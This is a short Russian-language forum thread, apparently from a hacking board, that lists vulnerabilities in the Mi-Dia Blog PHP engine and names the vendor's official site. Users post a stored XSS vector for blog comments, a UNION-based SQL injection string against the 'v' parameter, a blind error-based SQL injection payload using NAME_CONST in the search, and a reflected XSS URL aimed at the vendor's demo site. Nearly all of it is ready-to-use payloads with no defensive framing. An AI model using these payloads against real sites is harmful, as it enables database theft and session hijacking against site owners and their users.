PDA

Просмотр полной версии : Mi-Dia Blog

Ctacok
08.11.2009, 06:27
Название: Mi-Dia Blog
Автор: Christopher Shaw
Адресс оффициальной странички: http://www.mi-dia.co.uk/

Активная XSS.
В комментариях к записям блога.
javascript:alert()
SQL Иньекция
?s=view&v=-1'+union+select+1,2,3,4,5,6,7,8,9+--+
Кода много, приведу тока фильтрациб.

$v = htmlspecialchars($_GET['v']);
$d = htmlspecialchars($_GET['d']);
[x60]unu
09.04.2010, 21:43
product : Mi-Dia Blog v1.0.4
Blind SQL
search --->
mq=off
mysql = 5
xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
warlok
09.04.2010, 22:25
еще пассивная xss

http://demo.mi-dia.co.uk/?s=search&tags=%3Cscript%3Ealert(/xss/)%3C/script%3E